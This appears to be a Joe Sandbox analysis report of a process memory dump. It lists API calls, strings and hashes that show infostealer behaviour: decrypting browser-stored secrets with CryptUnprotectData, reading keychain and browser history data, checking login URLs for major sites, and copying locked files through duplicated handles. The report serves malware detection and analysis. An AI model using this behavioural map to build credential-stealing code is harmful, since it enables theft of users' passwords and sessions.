                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 1945712969-0
                            • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                            • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                            • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileFind$FirstNext
                            • String ID:
                            • API String ID: 1690352074-0
                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                            APIs
                            • memset.MSVCRT ref: 0041898C
                            • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InfoSystemmemset
                            • String ID:
                            • API String ID: 3558857096-0
                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                            Control-flow Graph

                            • Control-flow graph of the function at 0044553B (rendered graph omitted; the APIs it calls are listed below)
                            APIs
                            • memset.MSVCRT ref: 004455C2
                            • wcsrchr.MSVCRT ref: 004455DA
                            • memset.MSVCRT ref: 0044570D
                            • memset.MSVCRT ref: 00445725
                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                              • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                              • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                            • memset.MSVCRT ref: 0044573D
                            • memset.MSVCRT ref: 00445755
                            • memset.MSVCRT ref: 004458CB
                            • memset.MSVCRT ref: 004458E3
                            • memset.MSVCRT ref: 0044596E
                            • memset.MSVCRT ref: 00445A10
                            • memset.MSVCRT ref: 00445A28
                            • memset.MSVCRT ref: 00445AC6
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                            • memset.MSVCRT ref: 00445B52
                            • memset.MSVCRT ref: 00445B6A
                            • memset.MSVCRT ref: 00445C9B
                            • memset.MSVCRT ref: 00445CB3
                            • _wcsicmp.MSVCRT ref: 00445D56
                            • memset.MSVCRT ref: 00445B82
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                            • memset.MSVCRT ref: 00445986
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                            • String ID: *.*$Apple Computer\Preferences\keychain.plist
                            • API String ID: 381723030-3798722523
                            • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                            • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                            • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                            • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                              • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                              • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                            • SetErrorMode.KERNEL32(00008001), ref: 00412799
                            • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                            • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                            • String ID: $/deleteregkey$/savelangfile
                            • API String ID: 1442760552-28296030
                            • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                            • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                            • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                            • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                              • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                            • wcsrchr.MSVCRT ref: 0040B738
                            • memset.MSVCRT ref: 0040B756
                            • memset.MSVCRT ref: 0040B7F5
                            • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            • CloseHandle.KERNEL32(00000000), ref: 0040B838
                            • memset.MSVCRT ref: 0040B851
                            • memset.MSVCRT ref: 0040B8CA
                            • memcmp.MSVCRT ref: 0040B9BF
                              • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                              • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • memset.MSVCRT ref: 0040BB53
                            • memcpy.MSVCRT ref: 0040BB66
                            • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                            • String ID: chp$v10
                            • API String ID: 229402216-2783969131
                            • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                            • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                            • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                            • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                            Control-flow Graph

                            • Control-flow graph of the function at 00413D4C (rendered graph omitted; the APIs it calls are listed below)
                            APIs
                              • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                            • memset.MSVCRT ref: 00413D7F
                            • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                            • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                            • memset.MSVCRT ref: 00413E07
                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                            • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                            • CloseHandle.KERNEL32(?), ref: 00413EA8
                            • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                            • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$??3@CloseProcessProcess32memset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                            • String ID: QueryFullProcessImageNameW$kernel32.dll
                            • API String ID: 3791284831-1740548384
                            • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                            • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                            • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                            • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                              • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                              • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                            • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                              • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                              • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                            • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                            • CloseHandle.KERNEL32(?), ref: 0040E13E
                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                            • CloseHandle.KERNEL32(?), ref: 0040E148
                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                            • String ID: bhv
                            • API String ID: 4234240956-2689659898
                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                            Control-flow Graph

                            • Control-flow graph of the function at 004466F4 (rendered graph omitted; the APIs it calls are listed below)
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                            • __set_app_type.MSVCRT ref: 00446762
                            • __p__fmode.MSVCRT ref: 00446777
                            • __p__commode.MSVCRT ref: 00446785
                            • __setusermatherr.MSVCRT ref: 004467B1
                            • _initterm.MSVCRT ref: 004467C7
                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                            • _initterm.MSVCRT ref: 004467FD
                            • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                            • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                            • exit.MSVCRT ref: 00446897
                            • _cexit.MSVCRT ref: 0044689D
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                            • String ID:
                            • API String ID: 2791496988-0
                            • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                            • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 0040C298
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                            • wcschr.MSVCRT ref: 0040C324
                            • wcschr.MSVCRT ref: 0040C344
                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                            • GetLastError.KERNEL32 ref: 0040C373
                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                            • String ID: visited:
                            • API String ID: 2470578098-1702587658
                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                            Control-flow Graph

                            Control-flow graph of the function at 0x40E175 (rendered graph, executed/not-executed legend and basic-block edge list omitted). Its blocks call memset, ??3@YAXPAX@Z and _snwprintf, plus the internal subroutines 0x40695D, 0x406B90, 0x4069A3, 0x406E8F, 0x406B53, 0x40DD50, 0x40AA04, 0x40742E, 0x40AAE3 and 0x40A8D0.
                            APIs
                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                            • memset.MSVCRT ref: 0040E1BD
                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                            • _snwprintf.MSVCRT ref: 0040E257
                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                              • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                              • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                            • API String ID: 3883404497-2982631422
                            • Opcode ID: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                            • Opcode Fuzzy Hash: 366cc36c026cd150a239da38b4c6b1e2e10dbbf4b03b5b4663773bd365af82a7
                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                              • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                            • memset.MSVCRT ref: 0040BC75
                            • memset.MSVCRT ref: 0040BC8C
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                            • memcmp.MSVCRT ref: 0040BCD6
                            • memcpy.MSVCRT ref: 0040BD2B
                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                            • String ID:
                            • API String ID: 115830560-3916222277
                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                            • String ID: r!A
                            • API String ID: 2791114272-628097481
                            • Opcode ID: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                            • Opcode Fuzzy Hash: e760b227a922d4e3f094a9eb3eb7a7fe7130a7247a75f8eef54ce2a40c46c596
                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                            Control-flow Graph

                            APIs
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                              • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                            • _wcslwr.MSVCRT ref: 0040C817
                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                            • wcslen.MSVCRT ref: 0040C82C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                            • API String ID: 62308376-4196376884
                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                            Control-flow Graph

                            Control-flow graph of the function at 0x40B58D (rendered graph, executed/not-executed legend and basic-block edge list omitted). Its blocks call GetModuleHandleW, FindResourceW, LoadResource, SizeofResource, LockResource and memcpy, plus the internal subroutines 0x40AFCF, 0x40B4D3, 0x40B3C1 and 0x40B04B.
                            APIs
                            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                            • FindResourceW.KERNEL32(00000000,00000032,BIN), ref: 0040B5B6
                            • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                            • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                            • LockResource.KERNEL32(00000000), ref: 0040B5DD
                            • memcpy.MSVCRT ref: 0040B60D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                            • String ID: BIN
                            • API String ID: 1668488027-1015027815
                            • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                            • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                            • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                            • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED

                            Control-flow Graph

                            APIs
                            • memset.MSVCRT ref: 00403CBF
                            • memset.MSVCRT ref: 00403CD4
                            • memset.MSVCRT ref: 00403CE9
                            • memset.MSVCRT ref: 00403CFE
                            • memset.MSVCRT ref: 00403D13
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
